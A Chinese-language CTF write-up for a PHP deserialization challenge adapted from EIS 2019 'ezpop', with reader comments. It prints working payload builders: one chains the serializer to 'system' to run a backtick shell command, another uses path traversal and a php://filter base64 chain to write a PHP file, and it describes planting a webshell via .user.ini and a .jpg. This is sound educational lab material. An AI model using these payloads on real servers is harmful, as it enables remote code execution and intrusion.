一、前言
原本想着过年了搞搞活动啥的,说从日本回来出三个题给大家发发红包的,结果事情挺多的,搞了一个题放出来先让大家玩玩。
二、解题情况
最终在截止时间之前有 19 位同学做出来,其中第一位同学在题目放出两个小时之后就做出来了,很赞?
三、Writeup
接下来就是 Writeup 了,过着年事情挺多的,就把大家用到的方法简略写一下了。
本题改编自 EIS 2019 的 ezpop,那时候在做题的时候发现了另外一种解法,但事后发现没人就着那种方法写 wp,所以就暂时搁置下来留着以后拿来用用。
在这里和原题不同的是加了下面这个,对文件名有所控制。
public function getCacheKey(string $name): string {
// 使缓存文件名随机
$cache_filename = $this->options['prefix'] . uniqid() . $name;
if(substr($cache_filename, -strlen('.php')) === '.php') {
die('?');
}
return $cache_filename;
}原题 Writeup:http://www.rayi.vip/2019/11/27/EIS%202019/
1、预期解
使用如下的 Payload(前面类定义省略,自己复制):
$testB = new B();
$testB->options['prefix'] = 'abc';
$testB->options['serialize'] = 'system';
$testB->options['data_compress'] = false;
$testB->options['expire'] = "aaa\n";
$testB->writeTimes = 0;
$testA = new A($testB, "miao");
$testA->autosave = false;
$testA->cache = ['aaq' => '`cat /flag > ./flag.php`'];
$testA->complete = true;
echo urlencode(serialize($testA))."\n";
关键在 serialize 和 cache 里的命令那,
到源码中的
$data = $this->serialize($value);此处即可调用任意函数并且传参,即便参数在上面
return json_encode([$cleaned, $this->complete]);被 json 编码了,但我们仍然可以在其中插入一段完整的内容,所以插入一段用反引号`括起来的命令,由于整段东西传入 system 函数之后是调用 shell 来执行,执行顺序有先后,反引号内的会被先执行,即可达到我们执行命令的目的。
更多信息可以参考 https://www.anquanke.com/post/id/194036 。
2、其他解法1
为了降低难度,文件名那里没有封死,于是就给了大家很多发挥的空间。
对于前面的随机值,使用/../即可截断,后面即可追加写任意文件。
于是先写一个 .user.ini,然后写一个 .jpg 里面带马,使其追加到其他 php 后面作为 php 执行即可。
参见 http://althims.com/2020/01/29/buu-new-year/
3、其他解法2
和上面大同小异,也是任意写文件的锅,这里对于尾部 .php 的限制,可使用追加 /. 来绕过。
$testB = new B();
$testA = new A($testB, $key = '/../miao1.php/.');
$testA->complete = true;
$testA->autosave = false;
// <?php phpinfo();?\>
$testA->cache = array("PD9waHAgcGhwaW5mbygpOz8+"=>"");
$testB->options['prefix'] = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=';
$testB->options['serialize'] = 'strval';
$testB->options['data_compress'] = false;
$testB->options['expire'] = "aaa\n";
$testB->writeTimes = 0;
echo urlencode(serialize($testA))."\n";更多方法,欢迎补充。
预告:今晚(2020年01月29日)晚八点开放 MISC 新春红包题。
4 个评论
roverdoge的知识小屋
[…] 最后的Payload可以参考赵总的文章(https://www.zhaoj.in/read-6397.html),本文只记录思路 […]
roverdoge
不好意思赵总,写博客还不是很熟练,不知道为啥会出现这个评论,麻烦您有空的时候删一下,抱歉了。。。
Bill Xu
这个好像是WordPress的Pingback
Roverdoge
原来如此,多谢XD